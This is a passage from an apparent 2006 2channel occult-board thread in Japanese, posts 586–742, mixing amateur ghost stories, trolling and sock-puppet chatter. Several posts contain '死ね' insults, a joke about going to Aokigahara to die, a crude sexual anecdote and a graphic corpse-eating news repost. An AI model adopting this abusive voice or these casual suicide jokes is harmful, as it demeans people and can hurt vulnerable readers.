あの携帯番号も嘘だしアドも変更したしチャットももう閉鎖したんで
二度と俺達の前に姿現さないで下さいね☆




せいぜいもがき苦しめwwwwwwwwwwwwwwwwww













586 :本当にあった怖い名無し:2006/10/12(木) 14:53:37 ID:MrnhyK+80
>>582
だれが来たニャ?

587 :本当にあった怖い名無し:2006/10/12(木) 15:10:28 ID:hl/acUMF0
>>576
以前どこかのスレで、荒川静香がほっしゃんに似てるっていうのを見た。
納得した。


588 :本当にあった怖い名無し:2006/10/12(木) 15:13:54 ID:lQuHa7N+0
叫びながら表へ飛び出して木刀振り回すのが流行ってんだねw

589 :超アイカゴ:2006/10/12(木) 15:29:04 ID:l+y+a//SO
くるよ…くるよ…いっぱいくる

590 :アイカゴMAX:2006/10/12(木) 15:30:34 ID:MrnhyK+80
>>589
なにが来るニャ?どうしたニャ?

591 :アイカゴMAX:2006/10/12(木) 15:37:30 ID:MrnhyK+80
ニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャニャ

592 :本当にあった怖い名無し:2006/10/12(木) 15:53:20 ID:l+y+a//SO
>>591
荒らすなよ、せっかく怖い話で盛り上がってきたのに!!

593 :本当にあった怖い名無し:2006/10/12(木) 15:57:41 ID:MrnhyK+80
ほんとだよ全く・・・

594 :本当にあった怖い名無し:2006/10/12(木) 16:31:27 ID:MrnhyK+80
しっ!誰かくる!!

595 :本当にあった怖い名無し:2006/10/12(木) 16:56:26 ID:MrnhyK+80
なるほど皮用染料だったら良く浸透しそうだし指が黒くもならなさそうですね。

596 :本当にあった怖い名無し:2006/10/12(木) 17:15:54 ID:l+y+a//SO
>>595
てぃ!!!

597 :本当にあった怖い名無し:2006/10/12(木) 17:30:25 ID:MrnhyK+80
マツナガでも食べに行こうかな

598 :本当にあった怖い名無し:2006/10/12(木) 17:41:16 ID:l+y+a//SO
>>597
>>597
并并并并并并并并
并并并并并并并
并并并并并并
并并并并并
并并并并
广K并
并并



599 :本当にあった怖い名無し:2006/10/12(木) 17:48:36 ID:MrnhyK+80
売り切れてたニャ

600 :本当にあった怖い名無し:2006/10/12(木) 17:51:59 ID:YxMbxmRV0
>>581

また後日って・・・・

また下らない話を作って聞かせるってことなのかな?
やめてよね。

601 :本当にあった怖い名無し:2006/10/12(木) 17:54:36 ID:MrnhyK+80
>>581
楽しみに待ってます
読んでないけど

602 :本当にあった怖い名無し:2006/10/12(木) 17:54:48 ID:l+y+a//SO
>>600
まじヤメテほしいよな

603 :本当にあった怖い名無し:2006/10/12(木) 17:56:35 ID:l+y+a//SO
>>601
まじ荒らすなや!!
アイカゴ!!

604 :本当にあった怖い名無し:2006/10/12(木) 17:58:08 ID:MrnhyK+80
>>603
どーもアイカゴです。

605 :本当にあった怖い名無し:2006/10/12(木) 18:02:35 ID:MrnhyK+80
>>604
荒らすなよ!

606 :本当にあった怖い名無し:2006/10/12(木) 18:03:13 ID:u4c4qZpR0
おまいら定期的に通報されてること知らないのかよw
そのうちアク禁になるからw

607 :本当にあった怖い名無し:2006/10/12(木) 18:04:29 ID:l+y+a//SO
>>604
あっこんばんは(笑)はこれはどうも、私もアイカゴっていうんですよ〜
奇偶ですなワッホッホ

608 :本当にあった怖い名無し:2006/10/12(木) 18:06:38 ID:l+y+a//SO
>>606
ごめんなさい、邪魔ですよね
樹海行って死んできま〜す(^o^)

609 :本当にあった怖い名無し:2006/10/12(木) 18:08:36 ID:l+y+a//SO
樹海混んでた…(o_ _)o

610 :本当にあった怖い名無し:2006/10/12(木) 18:08:37 ID:MrnhyK+80
そしてアイカゴMAXに生まれ変わります!
ゎーぃ!

611 :本当にあった怖い名無し:2006/10/12(木) 18:09:33 ID:l+y+a//SO
>>610
荒らすなや!!

612 :本当にあった怖い名無し:2006/10/12(木) 18:09:34 ID:MrnhyK+80
>>609
混んでた?!
kwsk!!

613 :本当にあった怖い名無し:2006/10/12(木) 18:10:20 ID:l+y+a//SO
>>612
荒らすなや!!

614 :本当にあった怖い名無し:2006/10/12(木) 18:11:24 ID:MrnhyK+80
わかりました。
ごめんなさい。
もう二度と来ません。

615 :本当にあった怖い名無し:2006/10/12(木) 18:15:45 ID:l+y+a//SO
>>614
強く言い過ぎた…ごめん…ここに入れて…
(())


616 :本当にあった怖い名無し:2006/10/12(木) 18:24:20 ID:GT5K13TO0
このスレで何か見た系の話する奴は
大体前から出るって言われてるとか
昔〜だったとかからめなきゃお話作れんらしいな

617 :本当にあった怖い名無し:2006/10/12(木) 18:34:32 ID:l+y+a//SO
>>616
いちいちお前がいう必要はない…











なんて(^o^)

618 :本当にあった怖い名無し:2006/10/12(木) 18:37:40 ID:r7Br3i2jO
アイカゴって時間が止まるだか戻る場所スレにいた、
はにゃぴんってやつじゃない?
ムカつき具合がやたら似てんだよな。

619 :本当にあった怖い名無し:2006/10/12(木) 18:53:18 ID:l+y+a//SO
>>618
お前馬鹿だろ?低能だろ?はにゃにゃ〜ん
人違いしてるねやねや

620 :本当にあった怖い名無し:2006/10/12(木) 19:32:22 ID:/1cfaYB9O
さがって下さーい、さがッて下さーぃ、皆さんそんな近付いたら、写真撮れませんよ。

621 :本当にあった怖い名無し:2006/10/12(木) 19:38:22 ID:KZOJvwdg0
えーと・・・
何から話していいやら・・・
ふにゃふにゃふにゃ・・・

622 :本当にあった怖い名無し:2006/10/12(木) 19:55:23 ID:l+y+a//SO
しっ!何かくる…

623 :本当にあった怖い名無し:2006/10/12(木) 20:08:43 ID:l+y+a//SO
しっ!くる……












シックル シックル(^0^) シックル シックル(^o^)

624 :本当にあった怖い名無し:2006/10/12(木) 20:18:42 ID:CieRuG7t0
荒らしより酷いここの住人

625 :本当にあった怖い名無し:2006/10/12(木) 20:24:16 ID:l+y+a//SO
>>624
お前よかましだろw

626 :本当にあった怖い名無し:2006/10/12(木) 20:25:39 ID:l+y+a//SO
>>624











ふぅ〜…

627 :本当にあった怖い名無し:2006/10/12(木) 20:36:32 ID:gPR9vUHKO
みんなの前世はもこだょーん

628 :本当にあった怖い名無し:2006/10/12(木) 20:51:00 ID:a34ERghu0
決して見ないでください 霊障が出るそうです(´・ω・`)
ttp://www.tanteifile.com/onryo/jikenbo/0609/29_01/index.html

629 :本当にあった怖い名無し:2006/10/12(木) 20:53:17 ID:KZOJvwdg0
えっと、どこから続ければいいでしょうか???

630 :アイカゴDELUXE:2006/10/12(木) 20:59:58 ID:KZOJvwdg0
アイカゴDELUXE降臨!!

631 :本当にあった怖い名無し:2006/10/12(木) 21:17:58 ID:ujWIoUqAO
お昼頃投下の話、とってもおもしろかったなー。

632 :本当にあった怖い名無し:2006/10/12(木) 21:21:20 ID:l+y+a//SO
照れるな〜
ファンの皆ありがとぅーーー!!!

633 :本当にあった怖い名無し:2006/10/12(木) 21:24:47 ID:l+y+a//SO
>>632
勘違いしてるよププ…

634 :本当にあった怖い名無し:2006/10/12(木) 21:26:07 ID:l+y+a//SO
>>633
死ねよ!!

635 :本当にあった怖い名無し:2006/10/12(木) 21:27:31 ID:l+y+a//SO
>>634
なんで俺様が死ななきゃなんねんだよ!!
テメーが死ね!!

636 :本当にあった怖い名無し:2006/10/12(木) 21:28:22 ID:zDW56qsrO
うわー自作自演…

今日俺は始めて失笑という言葉を理解した

637 :本当にあった怖い名無し:2006/10/12(木) 21:28:39 ID:l+y+a//SO
>>635
じゃ一番若い俺が死ぬよ

638 :本当にあった怖い名無し:2006/10/12(木) 21:30:03 ID:l+y+a//SO
>>637
いーやなんなら一番年上の俺が死のう!

639 :本当にあった怖い名無し:2006/10/12(木) 21:30:57 ID:l+y+a//SO
>>638
わかったよ…俺が死ぬよ

640 :本当にあった怖い名無し:2006/10/12(木) 21:31:36 ID:KZOJvwdg0
どうぞどうぞ

641 :本当にあった怖い名無し:2006/10/12(木) 21:31:50 ID:l+y+a//SO
>>639
どうぞどうぞ

642 :本当にあった怖い名無し:2006/10/12(木) 21:32:12 ID:KZOJvwdg0
>>641
m9(^Д^)プギャー

643 :本当にあった怖い名無し:2006/10/12(木) 21:32:55 ID:l+y+a//SO
>>640
何でだよー!!なんだこれは!!

644 :本当にあった怖い名無し:2006/10/12(木) 21:34:52 ID:KZOJvwdg0
>>643
m9(^Д^)プギャー

645 :本当にあった怖い名無し:2006/10/12(木) 21:34:55 ID:l+y+a//SO
>>636
今世紀一番の酷いツッコミをみた…
びっくりした…

646 :本当にあった怖い名無し:2006/10/12(木) 21:36:24 ID:KZOJvwdg0
>>645
君おもしろいね
アイカゴって名乗っていいよ
僕が考えたHNだけど

647 :本当にあった怖い名無し:2006/10/12(木) 21:40:13 ID:l+y+a//SO
>>646
元祖によくそんなこと…お前低能だな…

648 :本当にあった怖い名無し:2006/10/12(木) 21:48:21 ID:l+y+a//SO
超超超〜超超超〜超超超超超アイちゃん〜













馬鹿かよ俺…もう荒らすの飽きたよ…
皆ごめんな、もうヤメルわ。

649 :本当にあった怖い名無し:2006/10/12(木) 21:50:01 ID:KZOJvwdg0
>>648
そうだね
もう荒らしたらだめだよ

650 :本当にあった怖い名無し:2006/10/12(木) 22:17:22 ID:5UDO30NGO
携帯だし、あまり恐くないかもしれないですけどいいですか??

651 :本当にあった怖い名無し:2006/10/12(木) 22:20:03 ID:KZOJvwdg0
>>650
お願いします。

652 :本当にあった怖い名無し:2006/10/12(木) 22:26:05 ID:5UDO30NGO
最初を読んでなかった。すいません…。
今から7年前に地元で有名なスポットへ行った。当時から30年程前に、旅客機の墜落事故があって全員亡くなったという事故の慰霊碑があるところ。酒持って飲んで騒いでゴミも撒き散らしてきた。何も起こらないのでつまらなくなり当時付き合っていた彼の家に帰った。

653 :本当にあった怖い名無し:2006/10/12(木) 22:28:35 ID:1Cbk38En0
【メイドカフェ】メニューに『ちんぽみるく』が登場・・・東京【ちんぽみるく下さい】
http://etc3.2ch.net/test/read.cgi/siberia/1148289297/ (画像有)


654 :本当にあった怖い名無し:2006/10/12(木) 22:31:56 ID:5UDO30NGO
その日は何も無し。拍子抜け…。
彼の部屋は二階で、階段を上りきったすぐ左にありました。翌日、彼と部屋にいる時彼が
「ちょっとドア開けて」
意味も分からずドアを開けました。
「誰かいる?」 いないと答えると
「兄貴の部屋の方も?」
(兄の部屋は彼の部屋の奥)廊下にも階段にも誰もいないと伝えると、じゃあいいや…と、それ以上何も言いません。

655 :本当にあった怖い名無し:2006/10/12(木) 22:33:59 ID:LaHD/iE30
俺も今日昼に起きて家に誰も居ないと思って
上半身裸パンツ一丁でオナニー途中の
ギンギンなチンコを社会の窓から出して上下に振りながら
「ほんとにほんとにほんとにほんとにライオンだー」
と唄いながら廊下を行進していたところを
妹に見られた
すげぇリズミカルにチンコ振っていたんだよね

656 :本当にあった怖い名無し:2006/10/12(木) 22:38:09 ID:5UDO30NGO
そんなやりとりが毎日、一週間も続きました。(心霊スポットに行った日から居候してました)
ついに我慢出来ずに
「毎日何なの??」
と聞くと、彼はやっと話してくれました。
「お前がうちに来た日から誰か階段上ってくるんだよ…。んで、上りきったと思うと足音聞こえなくなるのさ。最初兄貴かと思ってたんだけど兄貴、月に一回帰ってくればいい方だし、ここ一週間毎日足音するし。怖がるかと思って何も言わなかったけど、お前何か拾ってきたの?」

657 :本当にあった怖い名無し:2006/10/12(木) 22:47:12 ID:5UDO30NGO
彼には心霊スポットに行った事は話してなかったのでびっくりです…。
彼にスポットに行った事を話すと
「あそこは本当にやばい。友達も拾ってきたりして大変だった」
と…。その後、懲りず2年後同じスポットで怖い思いしました…。機会があればまたm(__)m
長々と駄文すいません。

658 :本当にあった怖い名無し:2006/10/12(木) 22:49:02 ID:CXte4KHm0
>>657
機会があればまた?
もう来なくていいよ。

659 :本当にあった怖い名無し:2006/10/12(木) 22:51:01 ID:GT5K13TO0
ここはてめぇの日記帳じゃねぇんだ
ログあさりゃおまえとまったく同じようなんが山ほど見つかるぜ

660 :本当にあった怖い名無し:2006/10/12(木) 23:17:20 ID:l+y+a//SO
>>657
最悪だなお前!!もう来んじゃねぇぞ!!

661 :本当にあった怖い名無し:2006/10/12(木) 23:25:34 ID:KZOJvwdg0
>>660
そういうなよアイちゃん

662 :本当にあった怖い名無し:2006/10/12(木) 23:34:57 ID:IrzmHhZY0
>>652
>>654
>>656-657

乙でした。
ただ、このスレッドは荒らしも多いし、そんなに怖くない話は叩かれることも多いので、できればほんのりに投下したほうがいいよ。

ほんのりと怖い話スレ その34
http://hobby7.2ch.net/test/read.cgi/occult/1159309298/

663 :本当にあった怖い名無し:2006/10/12(木) 23:36:37 ID:qULC5WUQ0


撒き散らしたのはゴミだけか!



664 :本当にあった怖い名無し:2006/10/12(木) 23:51:02 ID:l+y+a//SO
>>663
俺も思った!!ゴミまきちらすとか最悪ぁよな!!!

665 :新〇結衣:2006/10/13(金) 00:10:26 ID:NOjuyNYzO
バイキングに行ったら隠して沢山タッパーにいれて持ち帰ります。
新〇結衣です。
一昨日のことなのでよく覚えてないのですが、飲み会に行ったんですよ。で酔っ払って記憶が飛んで次の日の朝、なぜか私のむねがBカップからFカップになってたんですよ。
嬉しい反面、気持悪いじゃないですか?
でね、ホスピタルに…あっ医者に行って観てもらったら……

666 :本当にあった怖い名無し:2006/10/13(金) 00:12:14 ID:S8KuuWD/0
>>665
○の中には垣が入るとか思った俺は負け組み

667 :本当にあった怖い名無し:2006/10/13(金) 00:12:29 ID:CWccuRe20
666 the number of the beast

668 :本当にあった怖い名無し:2006/10/13(金) 00:14:57 ID:CWccuRe20
失敗せりw

669 :本当にあった怖い名無し:2006/10/13(金) 00:17:18 ID:S8KuuWD/0
うはwおれ13日の金曜日に666書き込んじゃったのかww

どうでもい。

670 :新〇結衣:2006/10/13(金) 00:20:24 ID:NOjuyNYzO
あっ私、「あらまるゆい」と申しま……

671 :本当にあった怖い名無し:2006/10/13(金) 00:20:28 ID:/O3a4rhmO
ダミアン?
オーメン?

672 :本当にあった怖い名無し:2006/10/13(金) 00:25:25 ID:55l42T4Y0
DQNのきもだめしとか心霊スポット突撃の話が怖かった事はない。
ゴミ撒き散らしとか氏んだほうが良いよ>>657
あと多分「機会」はたくさんあると思うけど、マジで来なくていいよ。
どうせ怖くないんだから。

673 :本当にあった怖い名無し:2006/10/13(金) 00:30:53 ID:upibGgJR0
>>625-626

自分のレス見直せよw

674 :本当にあった怖い名無し:2006/10/13(金) 00:33:38 ID:NOjuyNYzO
>>672
いいこというねぇ〜
しみじみ心に染みるわ〜

675 :本当にあった怖い名無し:2006/10/13(金) 00:36:24 ID:NOjuyNYzO
>>673
ど、どうした!?いきなり低知能なこと言い出して???

676 :本当にあった怖い名無し:2006/10/13(金) 00:38:16 ID:Rbm0qmDI0
箱以来、ちょっと面白そうかな?という長文は皆文体が同じなのは気のせいか。
待たせる間とか引っ張り方も同じでなー

中の人はもう少しこう、なんか、変化を頼む!
話自体は面白いので…!

677 ::2006/10/13(金) 00:47:25 ID:NOjuyNYzO
キャッキャ、キャッキャキャッキャ
キャッキャ、キャッキャキャッキャ
キャッキャ、キャッキャキャッキャ

678 :本当にあった怖い名無し:2006/10/13(金) 00:48:47 ID:7GXEQi0+0
旅館のガキの話みたいに
ほんの少し頭使ってぞわぞわくるくらいがいいな

作れと言われても俺には無理だが

679 ::2006/10/13(金) 01:04:41 ID:NOjuyNYzO
キャッキャーーキャッキャーキーッキキキキキキキキキキキキキキキキキキキキキキキキッキキキキキッキキキキキキキキキキキキキキキキキッキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキキ

680 :本当にあった怖い名無し:2006/10/13(金) 01:06:44 ID:S8KuuWD/0
>>678-679
どうしたんだ?あらまるゆい。

681 ::2006/10/13(金) 01:23:16 ID:NOjuyNYzO
>>680
キャッ?

682 :本当にあった怖い名無し:2006/10/13(金) 01:33:52 ID:x6ylzQ7U0
>>681
寝ろ!

683 :本当にあった怖い名無し:2006/10/13(金) 02:02:11 ID:dY5qGGv/O
リアルな話。
俺のバイト先の先輩の友達の友達(女)に起きた話らしい

その人は大学生でアパートで1人暮らしをしていたらしい。
ある日ポストに一本のビデオテープが投函してあったらしい。
聖さやかの裏モノだったらしい。
その日はクリスマスだったらしい。

684 :本当にあった怖い名無し:2006/10/13(金) 02:03:49 ID:NOjuyNYzO
寂しいね?

685 :本当にあった怖い名無し:2006/10/13(金) 02:35:04 ID:NOjuyNYzO
>>1000
あんたがなにをしようと私はゆるさないよ!!
そして>>800あんたをいまのうちから呪縛をとき放ち、地獄の門をひらき、そこから落として、現実世界から追放の儀式をする!!たぶん肉体だけ残り靈は一生、現実世界に戻れることはないだろう…
つまり、もう虫にすら生まれ変わるないのだ

686 :本当にあった怖い名無し:2006/10/13(金) 02:38:43 ID:j6PO6s0v0
マンドクセッ。

687 :本当にあった怖い名無し:2006/10/13(金) 02:40:28 ID:NOjuyNYzO
>>686
実はポクもマンドクサ〜

688 :本当にあった怖い名無し:2006/10/13(金) 02:43:42 ID:j6PO6s0v0
コワイ話ししてチョーダイ!

689 :本当にあった怖い名無し:2006/10/13(金) 02:45:01 ID:NOjuyNYzO
何で?

690 :本当にあった怖い名無し:2006/10/13(金) 02:46:32 ID:NOjuyNYzO
ちょwwwまるさんwww

691 :本当にあった怖い名無し:2006/10/13(金) 02:59:22 ID:d9/ccXKO0
ヤレヤレ ┐(´ー`)┌コマッタネ

692 :本当にあった怖い名無し:2006/10/13(金) 03:05:16 ID:RfyU3Fry0
まとめ137の「故障だね」ってまんまアレだよね?

693 :本当にあった怖い名無し:2006/10/13(金) 04:10:08 ID:6nK/zBuRO
マンドリル

694 :本当にあった怖い名無し:2006/10/13(金) 06:20:34 ID:56zv2QTp0
会社の帰り道に道端で蹲ってるおっさんがいた。
なにか苦しそうだったので大丈夫ですかと話しかけるとおっさんは
「フォメラッ!!」
と叫びながら俺に突進してきた。
最初は酔っ払いだと思ったがよく見ると目の焦点が定まっていない。
おっさんは上着のポケットからこびんを取り出すと
「せいしおくれよぉ〜〜」とブツブツ言いながら近づいてきた。
直感で羽交い締めにされ精子を採取されると思ったのでおっさんを傘で殴って逃げた。
怖かった。

695 :本当にあった怖い名無し:2006/10/13(金) 07:03:54 ID:897JQlma0
[人喰い犬]飼い主の死体を食べながら飢えを凌いでいた犬


腐乱した飼い主夫婦の亡骸と、その亡骸を食べながら餓えを凌いでいた犬が
発見されました。

死亡していたのは英ケント州、ポムベリーに近いブレンチリーの一軒家に住む
アルバート・スプリングスさん夫妻で、犬は夫妻が飼っていたジャーマンシェパード
だそうです。

検死法廷に付された死因は、まず夫のアルバートさん(82歳)が入浴中に心臓病
の発作で急死、寝たきりの妻オードリーさん(70歳)は助けを呼ぶことも出来ず、
衰弱して死亡したものと推定されています。

法廷でジョン・クレイドン担当警部が語った現場の状況はすさまじく、まずは9月7日、
郵便配達夫の通報によって夫婦の家を訪れた警部は、あたりに猛烈な腐臭が漂って
いることに気づきました。

部屋に入ると、チョコレートの包み紙が散乱している他はさして荒らされた形跡は
ありませんでしたが、風呂場をのぞくとアルバートさんの首なし死体が浴槽にスープ
状にひろがり、寝室にはパジャマ姿のオードリーさんの死体が激しく食い散らかされた
様子で、本人の特定もできないほどに傷んでいたといいます。

中庭には汚物にまみれた犬がひどく衰弱した様子で佇んでおり、ほとんど肉のついて
いないアルバートさんの頭蓋骨が傍にころがっていました。 またリビングには、8月25日
に71歳の誕生日を迎えたオードリーさん宛のバースデーカードが残されていたところから、
発見は死後2週ほど経ってからのものとみられているそうです。

http://chiquita.blog17.fc2.com/blog-entry-1974.html


696 :本当にあった怖い名無し:2006/10/13(金) 07:26:49 ID:rkGENBoxO
それは洒落にならないくらい気持ち悪い。

697 :たぬ吉:2006/10/13(金) 08:00:47 ID:R9CFGg+uO
かんた見てるか?

あの人形のせいで左手なくなっちまったよ
痛かったよ死ぬほど痛かった
こんなんじゃ仕事もできんわな
うれしいか?なあ?満足か?
お前達のおかげで一つ生きがいができたよ

楽しみに待っててくれな

698 :本当にあった怖い名無し:2006/10/13(金) 08:16:58 ID:Zp6Yu9RHO
ゴキブリの話

部屋でときたまゴキブリを見かける。しかも大抵飛ぶ。
てか飛ぶから気づくんだけど。
カサコソと段ボールから音がするから、
殺虫剤スタンバイしてたらバサササって黒いのが滑空する。
着地したところをシュシュっとしてやったら凄い勢いで逃げていく。

その繰り返しで7月から10匹以上殺した。
で、昨日半年ぶりぐらいに部屋の大掃除をしたんだけど、
死骸が一つも見つからないの。これおかしいよね。
生き延びたはずないのに。でも見つからない。
それからずっと気になってたんだけど、さっきふと思ったんだよ。

この部屋にはもっと凄いのがいるんじゃないかって…。

699 :本当にあった怖い名無し:2006/10/13(金) 08:29:37 ID:y3Xin4D/0
P061204006160.ppp.prin.ne.jp

700 :本当にあった怖い名無し:2006/10/13(金) 09:05:57 ID:ntxTLzVt0
>>698
ゴキブリ食べてくれるアシダカグモがいるんじゃね?
でかいのになると足も入れれば20cm以上のやつとか居るからゴキブリより気持ち悪い

701 :本当にあった怖い名無し:2006/10/13(金) 10:27:30 ID:oXGBnjkv0
死期を悟ったゴキブリが集まる場所があるという…

702 :本当にあった怖い名無し:2006/10/13(金) 10:45:32 ID:+dnA3och0
けつ毛バーガーの「週刊ゲンダイ」の記事画像
http://image.blog.livedoor.jp/hayakun5232/imgs/c/1/c14f5729.gif


703 :本当にあった怖い名無し:2006/10/13(金) 10:47:55 ID:NOjuyNYzO
けつ毛バーガーっ?

704 :本当にあった怖い名無し:2006/10/13(金) 11:10:08 ID:OUolXI8a0
>>703
ん?どうした?

705 :もこ:2006/10/13(金) 12:16:20 ID:oEtlHprtO
もこもこ

706 :本当にあった怖い名無し:2006/10/13(金) 13:06:08 ID:OUolXI8a0
>>705
ん?どうした?

707 :本当にあった怖い名無し:2006/10/13(金) 13:09:29 ID:+zJktzYC0
マンドクセッ。

708 :本当にあった怖い名無し:2006/10/13(金) 13:12:22 ID:+zJktzYC0
コワイ話ししてチョーダイ!

709 :本当にあった怖い名無し:2006/10/13(金) 13:17:30 ID:OUolXI8a0
私が学生のころの話でもいいですか?

710 :本当にあった怖い名無し:2006/10/13(金) 13:19:40 ID:+zJktzYC0
カモン!

711 :本当にあった怖い名無し:2006/10/13(金) 13:26:56 ID:jtBHkVNnO
>>709
ん?どうした?

712 :本当にあった怖い名無し:2006/10/13(金) 13:43:14 ID:NOjuyNYzO
しっ!誰かくる…

713 :本当にあった怖い名無し:2006/10/13(金) 14:00:50 ID:OUolXI8a0
>>712
ん?どうしたニャ?

714 :本当にあった怖い名無し:2006/10/13(金) 14:49:31 ID:OUolXI8a0
ニャ?
ニャニャニャニャニャ
ニャニャ
ニャニャニャニャニャニャニャ
ニャ
ニャニャ
ニャ!

715 :本当にあった怖い名無し:2006/10/13(金) 14:59:39 ID:9A9IHQGN0
コワイ話ししてチョーダイ!

716 :本当にあった怖い名無し:2006/10/13(金) 15:02:38 ID:bbj/kt/6O
此処にはキチガイしかいないのな

717 :本当にあった怖い名無し:2006/10/13(金) 15:05:02 ID:OUolXI8a0
>>715
私が学生のころの話でもいいですか?

718 :本当にあった怖い名無し:2006/10/13(金) 15:06:56 ID:K9U+RCBF0
カモーン


719 :本当にあった怖い名無し:2006/10/13(金) 15:07:41 ID:9A9IHQGN0
カモン!

720 :本当にあった怖い名無し:2006/10/13(金) 15:40:53 ID:56zv2QTp0
おい!俺の怖い話は怖かったんか!?

721 :本当にあった怖い名無し:2006/10/13(金) 15:46:36 ID:OUolXI8a0
>>720
凄く怖かったです。

722 :本当にあった怖い名無し:2006/10/13(金) 15:47:16 ID:OUolXI8a0
>>720
凄く怖かったです。

723 :本当にあった怖い名無し:2006/10/13(金) 16:08:20 ID:NOjuyNYzO
しっ!何かする…

724 :本当にあった怖い名無し:2006/10/13(金) 16:10:07 ID:OUolXI8a0
>>723
えっ?どういうこと??
kwsk!

725 :本当にあった怖い名無し:2006/10/13(金) 16:21:23 ID:OUolXI8a0
えっとー・・・
はじめて書込みするんですがー・・・
ちゃんと書けてるのかなぁ?
うふふ

726 :本当にあった怖い名無し:2006/10/13(金) 16:22:49 ID:e0pFRSw8O
http://hobby7.2ch.net/test/read.cgi/occult/1156566253/

727 :本当にあった怖い名無し:2006/10/13(金) 16:31:11 ID:NOjuyNYzO
コアラのマーチが好きです
でも、パックンチョの方がも〜っと好きです。

728 :本当にあった怖い名無し:2006/10/13(金) 16:32:55 ID:OUolXI8a0
>>727
あ、私もプッカ大好きだよ。
うふふ

729 :新〇結衣:2006/10/13(金) 16:40:37 ID:NOjuyNYzO
ビックリマン買ってお菓子は食べてシールは捨てます。
新〇結衣です。
たんとお食べって言われたら皆さんどうします?
私は食べません。
何故なら私は少食だからです。rarara…
そもそもチョコが嫌いなんですよね〜ですよね〜ですよね〜…
という落語を観覧していきたいと思われる。
rarara

730 :本当にあった怖い名無し:2006/10/13(金) 16:43:35 ID:YzU9ZCVS0
5年位前に廃墟探検行った時、
浮浪者っぽい人と遭遇した。

正確には浮浪者と『思う』。
ぼろい軍服を着ていて、あからさまな程軍人だったから。
だから今でも自分の中では「幽霊」とかじゃなく、
「軍人の格好をした、廃墟に住む浮浪者」
という事にしている。

蔓を切るでっかいナイフ(これ何ていうんだっけ)
を持ってて、目がギラギラしてた。

全員足が竦んで、動けずにいた時、友人の誰かが、
「任務ご苦労様です、今日之にてこの地帯の戦闘は終了致しました。」
と言った。

その軍人の目が一瞬悲しそうになって、
そのまま背を向けて廃墟の奥へと戻っていった。
なぜか映画「ランボー」を思い出しながら、
早足で(猛ダッシュはしなかった)逃げた。

あの後、誰も彼もが無口だった。
皆、安易な行動を恥じ、後悔していた。
その後は無言で別れ、その後もこの件の事はあまり喋らなかった。
やがて時を経て、友人達ともバラバラになった。


だから、今尚、自分は、あの時の掛け声が誰の物だったのか、知らない・・・

731 :本当にあった怖い名無し:2006/10/13(金) 16:45:38 ID:EAvunQlq0
元から精神的弱い人ではあったんだけどね。その人をAさんとしましょう。
Aさんのパパが亡くなったの。まだ定年前でカッコいいパパでした。
Aさんは完全にファザコンだったね。だからかなり参ってた。
私とAさんは年に2、3回会って遊ぶくらいの仲なんだけど、
なんせ家が近いし幼稚園から大学まで偶然一緒だったの。
おまけといっちゃおまけなんだけどAさんのママも大分参っちゃってね。
お通夜の前の日から私が何故かずっと一緒。もうね、かわいそうを通り越えちゃってね。
朝起きると、腿の内側を見せるの。そこには結構大きな内出血の跡がいっぱい。
Aさん「見て、これパパが夜中に抓ったの」
かわいそうなのは分かるけどやっぱりゾクッときたね。
Aさんって男なんですよ。

732 :本当にあった怖い名無し:2006/10/13(金) 16:46:43 ID:OUolXI8a0
>>730
それは怖いですね。
私はお菓子もシールも捨てる派です。

733 :本当にあった怖い名無し:2006/10/13(金) 16:48:02 ID:NOjuyNYzO
しっ!何か取る…

734 :本当にあった怖い名無し:2006/10/13(金) 16:52:10 ID:OUolXI8a0
おまいら定期的に通報されてること知らないのかよw
そのうちアク禁になるからw

735 :本当にあった怖い名無し:2006/10/13(金) 16:57:10 ID:OUolXI8a0
>>734
ごめんなさい
もう来ません

736 :本当にあった怖い名無し:2006/10/13(金) 17:45:11 ID:NOjuyNYzO
>>735
もう来るなよ

737 :本当にあった怖い名無し:2006/10/13(金) 17:51:31 ID:OUolXI8a0
>>736
ごめんなさいごめんなさいごめんなさいごめんなさいごめんなさいごめんなさいごめんなさいごめんなさいごめんなさいごめんなアイカゴしねや!さいごめんなさいごめんなさいごめんなさいごめんなさい

738 :本当にあった怖い名無し:2006/10/13(金) 17:59:14 ID:4Gq/rt6e0
コワイ話ししてチョーダイ!

739 :本当にあった怖い名無し:2006/10/13(金) 18:03:42 ID:76D9FcE70
洒落にならないのは日本の労働環境

♪♪Hey Hey Hey 時には起こせよMovement♪♪

日本の劣悪過ぎる労働環境について考えてみませんか?
http://etc4.2ch.net/test/read.cgi/motenai/1159195374/

がっかりさせない期待にこたえてサビ残で鬱なオイラを捨てるよ♪
自分で動き出さなきゃ
何も起こらない夜に
デモ隊組織で自殺者救え♪


友人知人に職場で鬱になった人、自殺を選んでしまった人、認定はされなくとも事実上過労死のような死に方をされた方はいませんか?
彼らはなぜそこまで追い込まれなければいけなかったのでしょうか?
彼らは社会適応性が欠けていた?コミュニケーション能力が不足していた?

本当にそういうことなのでしょうか

働かなければ食べていけない我々民間人にとって、この問題は戦争と同じくらいの死活問題です
一緒に考えてみませんか?そして例え小さくても行動を起こしてみませんか?

740 :本当にあった怖い名無し:2006/10/13(金) 18:04:42 ID:NyveeYMyO
今日、ある工場のタンクを解体する仕事があった。
普段は現場指示するだけなのだが、職人さんの手が足らず俺も作業に加わる事に。

早速タンクの上に登って解体準備をしてると、相方の職人が叫び声と共にタンク内へ落下。
幸い、3分の1ほど水が張ってあって怪我はなかった。
中を通ってる配管の状況を確認しようと投入口から覗きこをだらしい。
ずぶ濡れでは仕事にならないので、近くのホームセンターで着替えを買いにいく事に。

741 :本当にあった怖い名無し:2006/10/13(金) 18:06:04 ID:7HIrsprY0
ある日、私は森に迷ってしまった。
夜になりお腹も減ってきた。
そんな中、一軒のお店を見つけた。
「ここはとあるレストラン」
変な名前の店だ。
私は人気メニューの「ナポリタン」を注文する。
数分後、ナポリタンがくる。私は食べる。
・・・なんか変だ。しょっぱい。変にしょっぱい。頭が痛い。
私は苦情を言った。
店長:「すいません作り直します。御代も結構です。」
数分後、ナポリタンがくる。私は食べる。今度は平気みたいだ。
私は店をでる。
しばらくして、私は気づいてしまった・・・
ここはとあるレストラン・・・
人気メニューは・・・ナポリタン・・・

これって何が怖いんだ?

742 :本当にあった怖い名無し:2006/10/13(金) 18:17:28 ID:OUolXI8a0
>>741
もうそれ怖いからやめて

